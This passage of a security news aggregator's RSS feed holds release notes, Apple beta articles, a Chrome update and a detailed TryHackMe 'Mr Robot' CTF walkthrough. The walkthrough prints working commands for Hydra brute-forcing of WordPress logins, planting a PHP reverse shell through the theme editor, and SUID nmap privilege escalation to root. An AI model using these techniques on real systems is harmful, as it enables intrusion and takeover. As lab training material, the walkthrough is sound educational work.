<li>Overhauled the v2 review panel. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Refined the session tab preview popover. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usrnk1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usrnk1">@usrnk1</a>)</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Fixed new sessions from Home using the wrong project.</li>
<li>Fixed first-launch onboarding so it only appears when appropriate.</li>
<li>Improved large review pane performance.</li>
<li>Fixed timeline loads that started on assistant replies by backfilling the missing user turn.</li>
<li>Restored typing in the composer while the window is unfocused.</li>
<li>Fixed dropdown search behavior. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Kept the v2 review pane mounted when switching session tabs.</li>
<li>Kept the terminal mounted when switching session tabs in a workspace.</li>
<li>Fixed session tab busy indicators to stay scoped to the correct server.</li>
<li>Fixed child-session navigation and lineage resolution during tab transitions.</li>
<li>Kept desktop window tabs after closing and reopening the app.</li>
</ul>
<p><strong>Thank you to 3 community contributors:</strong></p>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usrnk1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usrnk1">@usrnk1</a>:
<ul>
<li>feat(desktop): refine session tab preview popover (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788980437" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34792" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34792/hovercard" href="https://github.com/anomalyco/opencode/pull/34792">#34792</a>)</li>
<li>feat(desktop): add recently closed projects to home (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794880236" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34926" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34926/hovercard" href="https://github.com/anomalyco/opencode/pull/34926">#34926</a>)</li>
<li>feat(desktop): papercut fixes (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795127749" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34939" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34939/hovercard" href="https://github.com/anomalyco/opencode/pull/34939">#34939</a>)</li>
<li>feat(desktop): reopen closed tabs and background tab open (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4797586133" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/35010" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/35010/hovercard" href="https://github.com/anomalyco/opencode/pull/35010">#35010</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>:
<ul>
<li>feat(app): v2 review panel overhaul (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640338817" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/31882" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/31882/hovercard" href="https://github.com/anomalyco/opencode/pull/31882">#31882</a>)</li>
<li>feat(app): align subagent UI with v2 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795025617" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34931" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34931/hovercard" href="https://github.com/anomalyco/opencode/pull/34931">#34931</a>)</li>
<li>feat(app): improvements to model search (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795626375" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34954" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34954/hovercard" href="https://github.com/anomalyco/opencode/pull/34954">#34954</a>)</li>
<li>feat(app): dropdown search fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795864210" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34961" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34961/hovercard" href="https://github.com/anomalyco/opencode/pull/34961">#34961</a>)</li>
<li>feat(app): terminal improvements (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785228462" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/34747" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/34747/hovercard" href="https://github.com/anomalyco/opencode/pull/34747">#34747</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/StarpTech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/StarpTech">@StarpTech</a>:
<ul>
<li>feat(tui): add debug info dialog with copy to clipboard (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4797155811" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/35004" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/35004/hovercard" href="https://github.com/anomalyco/opencode/pull/35004">#35004</a>)</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Developer Beta 3 Released: Here’s Everything New]]></title>
<description><![CDATA[Apple has released iOS 27 Developer Beta 3 for registered developers. The update is now available with build number 24A5380h, and it arrives two weeks after the second developer beta.



This beta is mainly focused on bug fixes, performance improvements, and small refinements across the system. D...]]></description>
<link>https://tsecurity.de/de/3649646/ios-mac-os/ios-27-developer-beta-3-released-heres-everything-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649646/ios-mac-os/ios-27-developer-beta-3-released-heres-everything-new/</guid>
<pubDate>Mon, 06 Jul 2026 20:57:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released iOS 27 Developer Beta 3 for registered developers. The update is now available with build number 24A5380h, and it arrives two weeks after the second developer beta.



This beta is mainly focused on bug fixes, performance improvements, and small refinements across the system. Developers can install it now to test their apps before the public beta and final release later this year.



How to Update 



Before installing the update, make sure your iPhone is backed up. Developer betas can include bugs, battery drain, and app issues, so it is better to avoid installing them on your main device.



Follow these steps to install iOS 27 Developer Beta 3:




Open the Settings app on your iPhone.



Go to General.



Tap Software Update.



Tap Beta Updates.



Select iOS 27 Developer Beta.



Go back and wait for the update to appear.



Tap Download and Install.




Your iPhone must use the same Apple ID that is linked to your developer account. If the beta does not appear, restart your device and check again.



All the Changes



Apple has not highlighted any major new features for this beta yet. The update appears to focus on stability, fixes, and smaller system improvements.



Here are the expected changes and improvements in iOS 27 Developer Beta 3:




Performance improvements: The update should make the system feel smoother in daily use, especially while opening apps, switching between apps, and scrolling through system menus.



Bug fixes: iOS 27 is still in early testing, so Beta 3 likely fixes several issues found in the first two developer betas.



UI refinements: Apple usually makes small design adjustments during early beta releases. Some icons, animations, menus, and system elements may look slightly cleaner or more consistent.



Battery and heating improvements: Developer betas often affect battery life, but newer beta builds usually improve background activity and reduce unnecessary battery drain.



App compatibility fixes: Some third-party apps may work better after this update as developers continue testing their apps with iOS 27.



System stability: Beta 3 should reduce random crashes, freezes, and unexpected behavior reported in earlier builds.




At this stage, no major user-facing feature has been confirmed for iOS 27 Developer Beta 3. If new changes are found after installation, they will likely be smaller improvements rather than big feature additions.



Other Beta Updates Released Today



Along with iOS 27 Developer Beta 3, Apple also released new beta builds for iPadOS 27, macOS 27, tvOS 27, visionOS 27, and watchOS 27. These updates are also part of Apple’s ongoing developer testing cycle.



Should You Install iOS 27 Developer Beta 3?



You should install iOS 27 Developer Beta 3 only if you are a developer or if you are comfortable using unfinished software. Beta updates can cause bugs, battery issues, app crashes, and other problems.



If you want a more stable experience, it is better to wait for the public beta or the final release.



iOS 27 Developer Beta 3 is now available for developers. If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[tvOS 27 Developer Beta 3 Is Now Available: Here’s What’s New]]></title>
<description><![CDATA[Apple has released tvOS 27 Developer Beta 3 for developers. The update is now available for eligible Apple TV models enrolled in the developer beta program.



How to Update




Open Settings on your Apple TV.



Go to System.



Select Software Updates.



Turn on Beta Updates.



Choose tvOS 27...]]></description>
<link>https://tsecurity.de/de/3649644/ios-mac-os/tvos-27-developer-beta-3-is-now-available-heres-whats-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649644/ios-mac-os/tvos-27-developer-beta-3-is-now-available-heres-whats-new/</guid>
<pubDate>Mon, 06 Jul 2026 20:57:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released tvOS 27 Developer Beta 3 for developers. The update is now available for eligible Apple TV models enrolled in the developer beta program.



How to Update




Open Settings on your Apple TV.



Go to System.



Select Software Updates.



Turn on Beta Updates.



Choose tvOS 27 Developer Beta.



Select Update Software and install the latest build.




Make sure your Apple TV stays connected to power and Wi-Fi during the update.



What’s New



Apple has not shared any major new feature changes for tvOS 27 Developer Beta 3 yet.



This update likely focuses on:




Bug fixes: Apple may have fixed issues found in earlier tvOS 27 beta builds.



Performance improvements: The update should make the system feel smoother during app switching, streaming, and navigation.



Developer testing: Developers can test their apps again before the public release later this year.



Stability updates: Beta 3 may improve reliability for Apple TV apps, AirPlay, and system settings.




Since this is still a developer beta, some bugs and app issues may still appear. It is better to install it only on a secondary Apple TV if you rely on your device every day.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Desktop Update]]></title>
<description><![CDATA[The Dev channel has been updated to 152.0.7928.2 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place to...]]></description>
<link>https://tsecurity.de/de/3649411/it-security-nachrichten/chrome-dev-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649411/it-security-nachrichten/chrome-dev-for-desktop-update/</guid>
<pubDate>Mon, 06 Jul 2026 18:43:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Dev channel has been updated to 152.0.7928.2 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7912.0..152.0.7928.2?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr Robot CTF Walkthrough -TryHackMe Detailed]]></title>
<description><![CDATA[Writeup by CobrakaiI recently solved the Mr Robot CTF room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse she...]]></description>
<link>https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:10 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/437/1*VBbNWudhR1HvtyMylXnNMg.png"><figcaption>Writeup by Cobrakai</figcaption></figure><p>I recently solved the <strong>Mr Robot CTF</strong> room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse shells, hash cracking, Linux privilege escalation, and SUID abuse.</p><p>This writeup follows the complete path I used to move from initial access to root. I have also added explanations for every important step, because the real value of this box is not only getting the flags, but understanding why each step matters.</p><h3>Lab Setup</h3><p>First, I started the TryHackMe machine and connected my Kali Linux machine to the TryHackMe VPN.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>To connect Kali with TryHackMe, download your OpenVPN configuration file from:</p><p><strong>TryHackMe → Access → VPN Settings → Download Configuration File</strong></p><p>If the VPN file is on Windows and your Kali machine is running inside VMware, you can transfer it using scp:</p><pre>scp &lt;FULL-WINDOWS-FILE-PATH&gt; &lt;KALI-USERNAME&gt;@&lt;KALI-IP&gt;:&lt;DESTINATION-PATH&gt;</pre><p>Example:</p><pre>scp C:\Users\user\Downloads\cyberpat.ovpn kali@192.168.1.10:/home/kali/</pre><p>After that, start the VPN connection from Kali:</p><pre>sudo openvpn &lt;FILENAME&gt;.ovpn</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>Once the VPN was connected, I started the target machine and received the target IP address.</p><h3>Opening the Web Application</h3><p>I opened the target IP in the browser:</p><pre>http://&lt;TARGET-IP&gt;</pre><p>The homepage showed a terminal-style Mr Robot themed interface. There were many commands visible on the page, but they were mostly visual distractions. In this room, the actual path comes from proper enumeration.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/677/1*O2PdkxBJXwnZjCDYXotcSA.png"><figcaption>Front Web Page of the App Part 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*Ix5Nxx8pZ5hHLFbMUzurXw.png"><figcaption>Front Web Page of the App Part 2</figcaption></figure><h3>Checking robots.txt</h3><p>Before running heavy enumeration, I checked the simplest and most common file first:</p><pre>http://&lt;TARGET-IP&gt;/robots.txt</pre><p>robots.txt is a plain text file placed at the root of a website. It tells search engine crawlers which paths they are allowed or not allowed to crawl.</p><p>In CTFs, this file is often used to hide interesting paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*m5Pf6nr3_XxwMUFa2FnlnA.png"><figcaption>Checking Robots.txt</figcaption></figure><p>Inside robots.txt, I found two interesting entries:</p><pre>key-1-of-3.txt<br>fsocity.dic</pre><p>I opened the first file and got the first key:</p><pre>073403c8a58a1f80d943455fb30724b9</pre><p>So the first key was recovered successfully.</p><h3>Nmap Enumeration</h3><p>While checking the web application manually, I also ran an Nmap scan in parallel.</p><pre>sudo nmap -sC -sV -O -A &lt;TARGET-IP&gt;</pre><p>The goal of this scan was to identify open ports, running services, versions, and possible operating system details.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*XcmS17aaKWaV9wFazMeDyg.png"><figcaption>Nmap Scan 1</figcaption></figure><p>The scan showed these important services:</p><pre>22/tcp   open   ssh<br>80/tcp   open   http<br>443/tcp  open   https</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*l7aZo93PY5Mr5f5VFWTasg.png"><figcaption>Nmap Scan 2</figcaption></figure><p>Some useful observations from the scan:</p><ul><li>SSH was exposed remotely.</li><li>HTTP was available on port 80.</li><li>HTTPS was available on port 443.</li><li>The web server disclosed Apache/Ubuntu details.</li><li>The SSL certificate appeared expired.</li></ul><p>These are not direct exploitation points by themselves, but they help build a picture of the target.</p><h3>Downloading fsocity.dic</h3><p>The second interesting file from robots.txt was:</p><pre>fsocity.dic</pre><p>I opened it in the browser and saw that it contained a large wordlist.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/712/1*xuaZvg6pU910v2d3qUx2Sg.png"><figcaption>Downloading the Wordlists</figcaption></figure><p>This wordlist becomes useful later for the alternative Hydra-based username and password discovery method.</p><h3>Directory Enumeration with Gobuster</h3><p>Next, I used Gobuster to enumerate hidden directories and files on the web server.</p><pre>sudo gobuster dir -u http://&lt;TARGET-IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 -k</pre><p>Command breakdown:</p><pre>dir</pre><p>Runs Gobuster in directory brute-forcing mode.</p><pre>-u http://&lt;TARGET-IP&gt;</pre><p>Specifies the target URL.</p><pre>-w</pre><p>Specifies the wordlist.</p><pre>-t 50</pre><p>Uses 50 threads to speed up the scan.</p><pre>-k</pre><p>Skips TLS certificate verification. This is mostly useful for HTTPS targets, but it does not hurt if reused in the command.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*JcomDvLAAlnEV-kNXLMicQ.png"><figcaption>Gobuster Scan Running</figcaption></figure><p>Gobuster returned several interesting paths, including WordPress-related directories.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*-pjY06PZDTX7PAsmZjJO0Q.png"><figcaption>Gobuster Scan Results</figcaption></figure><p>Important findings included:</p><pre>/wp-admin<br>/wp-content<br>/wp-includes<br>/wp-login.php<br>/license<br>/readme</pre><p>The /wp-login.php path confirmed that the target was running WordPress.</p><h3>WordPress Login Page</h3><p>I opened the login page:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*qJBRxhlW97Bu-NP4amSxNw.png"><figcaption>Wp-Login Page</figcaption></figure><p>At this point, I needed valid WordPress credentials. The next useful path was /license.</p><h3>Inspecting /license</h3><p>I opened:</p><pre>http://&lt;TARGET-IP&gt;/license</pre><p>The page showed a suspicious message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/691/1*S5LU74vlvb2K7yOFFyJ6cQ.png"><figcaption>Navigated to the /license Directory</figcaption></figure><p>Whenever a page looks suspicious in a CTF, checking the source code is a good habit. I viewed the page source and found a Base64-looking string hidden inside.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/722/1*JrOrvao3rNySKHEHm8R15A.png"><figcaption>Text at Bottom</figcaption></figure><p>I decoded the Base64 string and recovered credentials for the WordPress user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*D8BKNTBXYnwHqxmfbQFJpA.png"><figcaption>Decoding the Text</figcaption></figure><p>The credentials were:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>Using these credentials, I logged in to the WordPress admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*s0BvDREHoEJmof1w9hSgeg.png"><figcaption>Wp-Login Successfull</figcaption></figure><h3>Getting a Reverse Shell through WordPress Theme Editor</h3><p>After logging into WordPress, I started exploring the admin panel.</p><p>The important section was:</p><pre>Appearance → Theme Editor</pre><p>The Theme Editor allowed editing PHP files directly from the WordPress dashboard. This is dangerous because PHP code executed by the web server can be abused to get a reverse shell.</p><p>A reverse shell is a shell where the target machine connects back to the attacker machine.</p><p>In simple terms:</p><ol><li>I start a listener on my machine.</li><li>I place a reverse shell payload on the target.</li><li>The target connects back to my listener.</li><li>I get command execution on the target.</li></ol><p>I used a PHP reverse shell payload generated from:</p><pre>https://www.revshells.com/</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*3UchA43HXsnFpG82qb8u-Q.png"><figcaption>https://revershells.com/</figcaption></figure><p>Important point:</p><p>The IP address inside the reverse shell payload must be the attacker machine IP, not the target IP.</p><p>To find the attacker VPN IP, use:</p><pre>ip a</pre><p>Usually, the TryHackMe VPN interface is tun0.</p><p>Then I edited a PHP theme file from the WordPress Theme Editor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*zzeZXtnC53Xqp13Lj1kWwg.png"><figcaption>Replacing with the PHP Reverse Shell Code</figcaption></figure><p>I pasted the PHP reverse shell payload into a theme file such as:</p><pre>archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*37-Uh02yebTRGbS8NOc0AA.png"><figcaption>Pasted the Code</figcaption></figure><p>Before triggering the payload, I started a Netcat listener on my Kali machine:</p><pre>nc -lvnp 4444</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*vFOHGgyyrEDDoq71Uo7VdA.png"><figcaption>Netcat Listener Started</figcaption></figure><p>Then I accessed the modified PHP file from the browser:</p><pre>http://&lt;TARGET-IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*DWV67QlA1XOYgG9seCe7mg.png"><figcaption>Accessing that Edited PHP File</figcaption></figure><p>Once the page was opened, the target connected back to my listener.</p><h3>Initial Shell Access</h3><p>The reverse shell connected successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*OQyRkLeDQWLzedGiL85_dw.png"><figcaption>Voila, Got the Reverse Shell</figcaption></figure><p>I checked the current user:</p><pre>whoami</pre><p>The shell was running as the web server user, not as root.</p><p>Then I started enumerating the filesystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*BScsAYqgAMEJ8iOC7bEsOg.png"><figcaption>Got the Key 2 As Well</figcaption></figure><p>Inside /home/robot, I found:</p><pre>key-2-of-3.txt<br>password.raw-md5</pre><p>The second key file was not directly readable because of permissions. However, the password hash file was readable.</p><p>The hash looked like this:</p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><p>This was an MD5 hash for the robot user.</p><h3>Cracking the Robot User Hash</h3><p>I cracked the MD5 hash and got the password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*Cq5fXr8MtrmOoBUp7gV1rw.png"><figcaption>Cracking the Robot Password</figcaption></figure><p>Before switching users, I stabilized the shell.</p><p>A basic reverse shell often behaves badly:</p><ul><li>Arrow keys may not work.</li><li>Ctrl + C may kill the shell.</li><li>su, clear, nano, and similar commands may not work properly.</li><li>There is no proper TTY.</li></ul><p>To spawn a better shell, I used:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*m-8NWLldbgqSgzJysMESVA.png"><figcaption>Switching to the Robot User</figcaption></figure><p>Then I switched to the robot user:</p><pre>su robot</pre><p>Password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><p>After switching users, I read the second key:</p><pre>cat /home/robot/key-2-of-3.txt</pre><p>The second key was:</p><pre>822c73956184f694993bede3eb39f959</pre><p>I confirmed the current user:</p><pre>whoami<br>id<br>hostname</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*ajN7CbP56HWgIitDX0Vm9w.png"></figure><h3>Privilege Escalation Enumeration</h3><p>At this point, I had access as the robot user, but the final key was inside /root, so privilege escalation was required.</p><p>One common Linux privilege escalation technique is checking for SUID binaries.</p><p>SUID stands for <strong>Set User ID</strong>.</p><p>If a binary has the SUID bit enabled, it runs with the permissions of the file owner instead of the user who executes it.</p><p>If a SUID binary is owned by root, it may be possible to abuse it for root-level execution.</p><p>I searched for SUID binaries using:</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Command breakdown:</p><pre>find /</pre><p>Search from the root of the filesystem.</p><pre>-perm -u=s</pre><p>Find files where the SUID bit is set for the owner.</p><pre>-type f</pre><p>Only return regular files.</p><pre>2&gt;/dev/null</pre><p>Hide permission-denied errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*xATgnc0v_thCZNmhW5jSuw.png"><figcaption>Finding the SUID Permissions</figcaption></figure><p>The interesting result was:</p><pre>/usr/local/bin/nmap</pre><p>This stood out because nmap should normally not be SUID.</p><p>Also, the location was suspicious:</p><pre>/usr/local/bin/nmap</pre><p>The /usr/local/bin directory usually contains manually installed binaries, not default system binaries.</p><p>Older versions of Nmap had an interactive mode that could execute shell commands. If that old Nmap binary has the SUID bit and is owned by root, it can be abused to spawn a root shell.</p><p>I checked it using:</p><pre>ls -la /usr/local/bin/nmap<br>/usr/local/bin/nmap --version</pre><p>Then I started interactive mode:</p><pre>/usr/local/bin/nmap --interactive</pre><p>Inside the Nmap interactive prompt, I used:</p><pre>!sh</pre><p>That spawned a shell.</p><p>I confirmed root access:</p><pre>whoami</pre><p>Output:</p><pre>root</pre><p>Then I read the final key:</p><pre>cat /root/key-3-of-3.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*qXCV_UlQNk6RdxPtqOKmzg.png"><figcaption>Voila, Got 3rd Key As Well.</figcaption></figure><p>The third key was:</p><pre>04787ddef27c3dee1ee161b21670b4e4</pre><p>At this point, all three keys were recovered.</p><h3>Alternative Method: Finding Elliot Credentials with Hydra</h3><p>The /license method gives the WordPress password quickly, but there is another method using the fsocity.dic wordlist.</p><p>This method is useful because it teaches how to use Hydra against a WordPress login form.</p><h3>Cleaning the Wordlist</h3><p>First, I checked the size of the original wordlist:</p><pre>wc -w fsocity.dic</pre><p>The file was very large and had many duplicate entries.</p><p>To clean it, I sorted the file and removed duplicates:</p><pre>sort fsocity.dic | uniq &gt; fs-list</pre><p>Then I checked the size again:</p><pre>wc -w fs-list</pre><p>Command breakdown:</p><pre>wc -w fsocity.dic</pre><p>Counts the number of words in fsocity.dic.</p><pre>sort fsocity.dic</pre><p>Sorts the wordlist alphabetically.</p><pre>uniq</pre><p>Removes adjacent duplicate lines.</p><pre>&gt; fs-list</pre><p>Saves the cleaned output into a new file named fs-list.</p><p>This smaller cleaned wordlist makes Hydra faster.</p><h3>Finding the Valid WordPress Username</h3><p>Using Burp Suite, I inspected the WordPress login request.</p><p>The important POST parameters were:</p><pre>log<br>pwd</pre><p>WordPress used this error message when the username was invalid:</p><pre>Invalid username</pre><p>So I used Hydra to test every word from fs-list as a possible username while keeping the password fixed as test.</p><pre>hydra -L fs-list -p test &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><p>Command breakdown:</p><pre>-L fs-list</pre><p>Use usernames from the file fs-list.</p><pre>-p test</pre><p>Use one static password: test.</p><pre>http-post-form</pre><p>Tell Hydra that the target login uses an HTTP POST form.</p><pre>/wp-login.php</pre><p>WordPress login endpoint.</p><pre>log=^USER^&amp;pwd=^PASS^</pre><p>Hydra replaces ^USER^ with each username from the file and ^PASS^ with the static password.</p><pre>F=Invalid username</pre><p>Failure condition. If the response contains Invalid username, Hydra treats the attempt as failed.</p><pre>-t 30</pre><p>Run 30 parallel tasks.</p><p>Hydra found the valid username:</p><pre>elliot</pre><p>Important note: Hydra may show test beside the username in this step. That does not mean test is the correct password. It only means the username is valid.</p><h3>Finding Elliot’s Password</h3><p>After finding the username, I kept the username fixed and brute-forced the password using the same cleaned wordlist.</p><p>WordPress shows a different error when the username is valid but the password is wrong:</p><pre>The password you entered for the username</pre><p>So I used that as the failure condition:</p><pre>hydra -l elliot -P fs-list &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p>Command breakdown:</p><pre>-l elliot</pre><p>Use one static username.</p><pre>-P fs-list</pre><p>Use passwords from the file fs-list.</p><pre>F=The password you entered for the username</pre><p>If this message appears, Hydra knows the password is wrong.</p><p>Hydra found the valid credentials:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>These credentials can be used to log in here:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><h3>What I Learned</h3><p>This room is a good example of why basic enumeration matters.</p><p>The important lessons were:</p><ul><li>Always check robots.txt.</li><li>Do not ignore source code comments or hidden strings.</li><li>Directory brute-forcing can reveal critical application paths.</li><li>WordPress admin access can lead to code execution if theme editing is available.</li><li>Reverse shells require the attacker IP, not the target IP.</li><li>Always stabilize your shell before using commands like su.</li><li>Readable password hashes can lead to user switching.</li><li>SUID binaries are a major Linux privilege escalation vector.</li><li>Unusual SUID binaries in /usr/local/bin deserve attention.</li><li>Old versions of common tools can become privilege escalation paths.</li></ul><p>The box starts with simple web enumeration and ends with Linux privilege escalation through an old SUID Nmap binary. That makes it a solid practice machine for connecting web exploitation with post-exploitation basics.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=678d7908d472" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mr-robot-ctf-walkthrough-tryhackme-detailed-678d7908d472">Mr Robot CTF Walkthrough -TryHackMe Detailed</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CLI v3.0.37]]></title>
<description><![CDATA[Weaker models (e.g. DeepSeek) that emit malformed tool calls — wrong argument types or truncated JSON — are now handled gracefully and run instead of erroring out
Plan/act mode switches are now visible to the model, so it knows when you change modes mid-session
Fixed plan/act mode notices being d...]]></description>
<link>https://tsecurity.de/de/3644675/downloads/cli-v3037/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644675/downloads/cli-v3037/</guid>
<pubDate>Sat, 04 Jul 2026 04:46:07 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Weaker models (e.g. DeepSeek) that emit malformed tool calls — wrong argument types or truncated JSON — are now handled gracefully and run instead of erroring out</li>
<li>Plan/act mode switches are now visible to the model, so it knows when you change modes mid-session</li>
